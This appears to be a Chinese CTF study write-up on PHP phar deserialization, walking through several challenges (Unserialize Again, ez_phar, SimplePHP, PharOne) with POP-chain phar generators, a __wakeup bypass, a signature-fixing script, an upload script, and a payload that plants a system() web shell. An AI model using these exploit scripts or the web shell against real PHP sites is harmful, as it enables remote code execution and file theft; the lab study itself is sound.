12.1/复现.md
# WEEK5

## Unserialize Again

查看源代码

![image-20231127094541045](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127094541045.png)

猜测是cookie处有信息，抓包查看一下

![image-20231127094722717](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127094722717.png)

进入pairing.php查看cla

```php
 <?php
highlight_file(__FILE__);
error_reporting(0);  
class story{
    private $user='admin';
    public $pass;
    public $eating;
    public $God='false';
    public function __wakeup(){
        $this->user='human';
        if(1==1){
            die();
        }
        if(1!=1){
            echo $fffflag;
        }
    }
    public function __construct(){
        $this->user='AshenOne';
        $this->eating='fire';
        die();
    }
    public function __tostring(){
        return $this->user.$this->pass;
    }
    public function __invoke(){
        if($this->user=='admin'&&$this->pass=='admin'){
            echo $nothing;
        }
    }
    public function __destruct(){
        if($this->God=='true'&&$this->user=='admin'){
            system($this->eating);
        }
        else{
            die('Get Out!');
        }
    }
}                 
if(isset($_GET['pear'])&&isset($_GET['apple'])){
    // $Eden=new story();
    $pear=$_GET['pear'];
    $Adam=$_GET['apple'];
    $file=file_get_contents('php://input');
    file_put_contents($pear,urldecode($file));
    file_exists($Adam);
}
else{
    echo '多吃雪梨';
} 
```

看了看一些师傅的wp，发现这道题考的应该是phar反序列化：调用了“file_exists”函数，并未过滤phar流，有序列化，无"unserialize()"函数，文件上传，phar协议未过滤

### phar反序列化

#### 什么是phar

**Php ARchive**，类似于JAR的一种打包文件，将多个PHP文件打包为一个文件，可以和tar,zip互相转化（PHP >= 5.3）。

#### 文件结构

```
stub：类似于一种标志，格式为xxx<?php xxx; __HALT_COMPILER();?>，xxx不限内容，但是后文必须以__HALT_COMPILER();结尾，否则无法识别这个phar文件

manifest describing the contents（描述内容的清单）：phar文件实质上是一种压缩文件，其中每一个被压缩文件的权限、属性等信息都会放在这个部分。这个部分还会以序列化的形式存储用户自定义的meta-data，这是攻击手段的核心。

the file contents：文件内容

[optional] a signature for verifying Phar integrity (phar file format only)：可选可不选，签名，在文件末尾，根据翻译应该是分析phar文件的完整性
```

可以通过一些脚本来生成一个phar文件

```php
<?php
class Test{
    public $apple = 'good';
    public function __desturct(){
        echo 'this is destruct';
    }
}
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER();?>');
$test = new Test();
$phar->setMetadata($test);
$phar->addFromString('test.txt','test');
$phar->stopBuffering();
?>
```

然后用xxd查看phar文件（跟010editor差不多，用于查看文件对应的十六进制形式或者将文件对应的十六进制形式输出到一个指定的文件）

![image-20231127110952953](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127110952953.png)

然后会发现meta-data是以序列化方式来存储的

某些函数在调用这个phar文件时会将其反序列化，例如`file_get_contents()`

```php
<?php 
    class TestObject {
        public function __destruct() {
            echo 'this is destruct!';
        }
    }

    $filename = 'phar://test.phar/test.txt';
    file_get_contents($filename); 
?>
```

这里不知道是版本问题还是什么问题，我并没有调用到析构函数，不会又是版本问题吧？？？

此时就可以不通过unserialize()就可以进行反序列化操作

#### 几个例题

##### [HNCTF 2022 WEEK3]ez_phar

```php
<?php
show_source(__FILE__);
class Flag{
    public $code;
    public function __destruct(){
    // TODO: Implement __destruct() method.
        eval($this->code);
    }
}
$filename = $_GET['filename'];
file_exists($filename);
?> 
```

有`file_exists()`，那么应该就是phar反序列化了

先写一个生成phar文件的脚本

```php
<?php
class Flag{
    public $code = "system('cat /ffflllaaaggg');";
}
$a = new Flag();
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER();?>');
$phar->setMetadata($a);
$phar->addFromString('test.txt','test');
$phar->stopBuffering();
?>
```

然后看看有没有上传点吧，dirsearch扫一下

有个upload.php

![image-20231127152708096](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127152708096.png)

后面就不截图了，把名称改成1.jpg就行。

然后就是正常的phar序列化读取

![image-20231127153443272](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127153443272.png)

至于为什么可以直接改成图片后缀，这是因为php在识别phar文件的时候主要靠的是`__HALT_COMPILER();?>`这一段代码，对前面的内容和后缀名都没有要求

##### [SWPU 2018]SimplePHP

查看源代码，似乎没有什么用处，唯一有用的几个消息是flag的位置和疑似文件包含漏洞

![image-20231127154313740](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127154313740.png)

![image-20231127154324723](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127154324723.png)

那就依次用这个疑似漏洞查看index.php，flag.php，upload_file.php

![image-20231127154421492](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127154421492.png)

![image-20231127154446358](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127154446358.png)

![image-20231127154526615](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127154526615.png)

有两个额外文件，再去查看一下

function.php

```php
<?php 
//show_source(__FILE__); 
include "base.php"; 
header("Content-type: text/html;charset=utf-8"); 
error_reporting(0); 
function upload_file_do() { 
    global $_FILES; 
    $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; 
    //mkdir("upload",0777); 
    if(file_exists("upload/" . $filename)) { 
        unlink($filename); 
    } 
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename); 
    echo '<script type="text/javascript">alert("上传成功!");</script>'; 
} 
function upload_file() { 
    global $_FILES; 
    if(upload_file_check()) { 
        upload_file_do(); 
    } 
} 
function upload_file_check() { 
    global $_FILES; 
    $allowed_types = array("gif","jpeg","jpg","png"); 
    $temp = explode(".",$_FILES["file"]["name"]); 
    $extension = end($temp); 
    if(empty($extension)) { 
        //echo "<h4>请选择上传的文件:" . "<h4/>"; 
    } 
    else{ 
        if(in_array($extension,$allowed_types)) { 
            return true; 
        } 
        else { 
            echo '<script type="text/javascript">alert("Invalid file!");</script>'; 
            return false; 
        } 
    } 
} 
?>
```

base.php

```php+HTML
<?php 
    session_start(); 
?> 
<!DOCTYPE html> 
<html> 
<head> 
    <meta charset="utf-8"> 
    <title>web3</title> 
    <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/css/bootstrap.min.css"> 
    <script src="https://cdn.staticfile.org/jquery/2.1.1/jquery.min.js"></script> 
    <script src="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script> 
</head> 
<body> 
    <nav class="navbar navbar-default" role="navigation"> 
        <div class="container-fluid"> 
        <div class="navbar-header"> 
            <a class="navbar-brand" href="index.php">首页</a> 
        </div> 
            <ul class="nav navbar-nav navbra-toggle"> 
                <li class="active"><a href="file.php?file=">查看文件</a></li> 
                <li><a href="upload_file.php">上传文件</a></li> 
            </ul> 
            <ul class="nav navbar-nav navbar-right"> 
                <li><a href="index.php"><span class="glyphicon glyphicon-user"></span><?php echo $_SERVER['REMOTE_ADDR'];?></a></li> 
            </ul> 
        </div> 
    </nav> 
</body> 
</html> 
<!--flag is in f1ag.php-->
```

看上去唯一的突破点在function.php中，观察发现这一段可以尝试用phar突破

```php
$filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; 
    if(file_exists("upload/" . $filename)) { 
        unlink($filename); 
    } 
```

有个问题是，反序列化的点在哪呢？是用伪协议还是用反序列化？

哦，还有一个file.php忘看了

```php
<?php 
header("content-type:text/html;charset=utf-8");  
include 'function.php'; 
include 'class.php'; 
ini_set('open_basedir','/var/www/html/'); 
$file = $_GET["file"] ? $_GET['file'] : ""; 
if(empty($file)) { 
    echo "<h2>There is no file to show!<h2/>"; 
} 
$show = new Show(); 
if(file_exists($file)) { 
    $show->source = $file; 
    $show->_show(); 
} else if (!empty($file)){ 
    die('file doesn\'t exists.'); 
} 
?> 
```

class.php

```php
 <?php
class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";//检测
        }
    }
}
class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();//使$params变成数组
    }
    public function __get($key)
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?> 
```

那么最终切入点算是找到了

先看看pop链怎么构造

首先切入点选择`C1e4r`类，根据析构函数的`echo`可以得知下一个对象为`Show`，下一个则是`Test`了

脚本如下

```php
<?php
class C1e4r{
    public $test;
    public $str;
}
class Show{
    public $source;
    public $str;
}
class Test{
    public $file;
    public $params;
}
$a = new C1e4r();
$b = new Show();
$c = new Test();
$c->params['source'] = '/var/www/html/f1ag.php';
$a->str = $b;
$b->str['str'] = $c;
$phar = new Phar('test1.phar');
$phar->startBuffering();
$phar->setStub('<? __HALT_COMPILER();?>');
$phar->setMetadata($a);
$phar->addFromString('test1.txt','test1');
$phar->stopBuffering();
?>
//O:5:"C1e4r":2:{s:4:"test";N;s:3:"str";O:4:"Show":2:{s:6:"source";N;s:3:"str";a:1:{s:3:"str";O:4:"Test":2:{s:4:"file";N;s:6:"params";a:1:{s:6:"source";s:22:"/var/www/html/f1ag.php";}}}}}
```

（这里我原本把phar放进010改一下的，发现根本不用，因为source为空……）

直接上传（我这里改成2.jpg，至于原因可以看看前面）

但是我们并不知道文件的名字（因为前面有一段上传之后将文件名和servername连起来进行MD5编码，破解起来似乎有点麻烦？）

看看能不能直接进/upload

![image-20231127162915274](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127162915274.png)

然后用phar读

![image-20231127164036216](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127164036216.png)

得到flag



为了进入system，我们需要让God=ture且user=admin，这个前提是你得绕过`__wakeup()`

这里的话绕过`__wakeup()`也很简单，把输出后的序列化字符串改一下属性就行

```php
<?php
class Story{
    private $user;
    public $pass;
    public $eating;
    public $God;
}
$a = new Story();
$a->user = 'admin';
$a->God = 'true';
$a->eating = 'ls /';
$phar = new Phar("exp.phar");                     //.phar文件
$phar->startBuffering(); 
$phar->setStub('<?php __HALT_COMPILER();?>');   //phar固定的格式
$phar->setMetadata($a);                       //触发的头是C1e4r类，所以传入C1e4r对象
$phar->addFromString("exp.txt", "text");          //生成签名
$phar->stopBuffering();
?>
```

生成后用010改一下属性以绕过`__wakeup()`

![image-20231127120128641](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127120128641.png)

修一下签名，脚本如下

```php
from hashlib import sha256
with open("hacker.phar",'rb') as f:
   text=f.read()
   main=text[:-40]        #正文部分(除去最后40字节)
   end=text[-8:]		  #最后八位也是不变的	
   new_sign=sha256(main).digest()
   new_phar=main+new_sign+end
   open("hacker.phar",'wb').write(new_phar) 
```

修复之后：test为签名的最后部分，所以应该是从test修到最后（不包含test）

![image-20231127120201015](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127120201015.png)

然后写一个脚本用于上传

```php
import urllib.parse
import os
import re
import requests

url='http://1c6e2942-f983-47cc-a6ef-9612e7519196.node4.buuoj.cn:81/'
pattern = r'flag\{.+?\}'
params={
    'pear':'hacker.phar', 
    'apple':'phar://hacker.phar'
}

with open('hacker.phar','rb') as fi:
    f = fi.read()
    ff=urllib.parse.quote(f)//将数据进行url编码
    fin=requests.post(url=url+"pairing.php",data=ff,params=params)
    matches = re.findall(pattern, fin.text)
    for match in matches:
        print(match)
```

flag{b78c61dd-128a-4f87-84b1-8e85744932cd}



# WEEK4

## PharOne

这题跟上个题目差不多，加了个`__HALT_COMPILER`的过滤

打开源代码发现有提示class.php

![image-20231127174240348](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127174240348.png)

依旧是简简单单一句话，unlink是删除文件

`exec`命令似乎是不回显的，因此cmd要写一个马

```php
<?php
class Flag{
    public $cmd="echo \"<?=system(\\\$_GET[1]);?>\" > /var/www/html/1.php";
}
$a = new Flag();
$phar = new Phar('test1.phar');
$phar->startBuffering();
$phar->setStub('<? __HALT_COMPILER();?>');
$phar->setMetadata($a);
$phar->addFromString('test1.txt','test1');
$phar->stopBuffering();
?>
```

执行之后用gzip压缩用于绕过，然后为了上传方便，改成jpg后缀

![image-20231127181427868](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127181427868.png)

上传之后进入class.php，用phar读取上传后的文件，然后进入1.php

![image-20231127183026153](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127183026153.png)

![image-20231127183009015](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127183009015.png)

![image-20231127182950425](C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20231127182950425.png)